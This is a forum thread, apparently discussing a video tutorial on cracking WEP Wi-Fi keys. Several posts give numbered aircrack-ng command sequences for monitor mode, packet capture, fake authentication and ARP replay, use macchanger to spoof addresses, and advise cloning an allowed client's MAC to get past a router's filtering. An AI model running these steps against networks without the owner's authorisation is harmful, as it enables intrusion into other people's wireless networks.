-=Xploitz=- VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"

[-=Xploitz=-]

Usually I just pop the card out..then pop it back in.

Faster than typing commands. INSTANT MANAGED MODE!!

[MisterCrash]

Man you are full of great ideas. I had no idea this would work. Is it possible to start up in monitor mode by default upon reconnecting?

[-=Xploitz=-]

Man you are full of great ideas. I had no idea this would work. Is it possible to start up in monitor mode by default upon reconnecting?

lol.....No. That my friend, you have to do the good old fashioned long way.

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0

[papadoc]

Just wanted to drop a quick thanks to you, Xploitz, for the very informative how-to guide. I have seen many around the web, but this one was by far the easiest to follow. I was finally successful in retrieving my wep key under BT 2.0 for the first time which I previously only been able to do under an earlier release of BT.

[-=Xploitz=-]

Just wanted to drop a quick thanks to you, Xploitz, for the very informative how-to guide. I have seen many around the web, but this one was by far the easiest to follow. I was finally successful in retrieving my wep key under BT 2.0 for the first time which I previously only been able to do under an earlier release of BT.

Your welcome papadoc. Thanks for taking the time to thank me personally. Its appreciated!

My objective was to make it as e-z as possible....for amateurs and no0bies alike.

Glad you liked it and got it to crack your WEP on BT2.

[juvenile]

Thanks for the guides and help

[tom73]

Yes, you may always omit step 5 if you already know your networks information (essid,bssid,channel its on..etc)

Only use step 4 one time!! Or else your gonna have ath0 interfaces all the way up to 9999!!! And you'll never get on the right channel...and yep..you guessed it...no more spoofed MAC address.

yeeeesss, it worked. However, if I were to skip step 5, how am I supposed to gather all the data? I'd pretty much have to run step 5 and then reboot and start all over again. Isn't there an easier way?

Also, if I can't spoof the mac address anymore, how would I go about my router that has mac filtering enabled?

thank you

1. airmon-ng stop ath0
2. ifconfig wifi0 down
3. macchanger --mac 00:11:22:33:44:55 wifi0
4. airmon-ng start wifi0 6
5. airodump-ng ath0 (closed window before going to next step)
6. airodump-ng -c [channel] -w file --bssid [router mac] ath0 (kept window open and opened new window for next step)
7. aireplay-ng -1 0 -a [router mac] -e ["router name"] -h 00:11:22:33:44:55 ath0 (authentication successful, client shows up in step's 6 window)
8. aireplay-ng -3 -b [router mac] -h 00:11:22:33:44:55 ath0 (no ARP requests)

[-=Xploitz=-]

yeeeesss, it worked. However, if I were to skip step 5, how am I supposed to gather all the data? I'd pretty much have to run step 5 and then reboot and start all over again. Isn't there an easier way?

Also, if I can't spoof the mac address anymore, how would I go about my router that has mac filtering enabled?

thank you

1. airmon-ng stop ath0
2. ifconfig wifi0 down
3. macchanger --mac 00:11:22:33:44:55 wifi0
4. airmon-ng start wifi0 6
5. airodump-ng ath0 (closed window before going to next step)
6. airodump-ng -c [channel] -w file --bssid [router mac] ath0 (kept window open and opened new window for next step)
7. aireplay-ng -1 0 -a [router mac] -e ["router name"] -h 00:11:22:33:44:55 ath0 (authentication successful, client shows up in step's 6 window)
8. aireplay-ng -3 -b [router mac] -h 00:11:22:33:44:55 ath0 (no ARP requests)

Reboot?? Why would you reboot??

Step 5 was just used to gather your networks details..nothing more..thats why there was no -w (file-name-to-write-to)

when you do step 6...there is the -w (wite-to-file-name-here) which captures the data in that file name.

Also..why would spoofing your mac not work anymore? It always works!..Just match your macchanger --mac xx:xx:xx:xx:xx:xx command to match the mac of a client on your AP's / routers allowed list from your AP's / routers Mac filtering settings.

Or..just don't check MAC filtering in your AP's / routers settings....or reset the AP / router.

[tom73]

Reboot?? Why would you reboot??

Step 5 was just used to gather your networks details..nothing more..thats why there was no -w (file-name-to-write-to)

well, because when I lock the wireless card into a certain channel in step 4, how could I get an overview of the entire channel spectrum in step 5?

[-=Xploitz=-]

well, because when I lock the wireless card into a certain channel in step 4, how could I get an overview of the entire channel spectrum in step 5?

OOhh!!..lol..I see what your saying now..lol

Just redo step 4...but leave off the channel 6 part..lol


so all you need to do to get the full channel spectrum is close airodump (if your already locked on a certain channel)...and repeat step 4 without the channel in it. ...then do your airodump ath0...and you should be channel hopping away.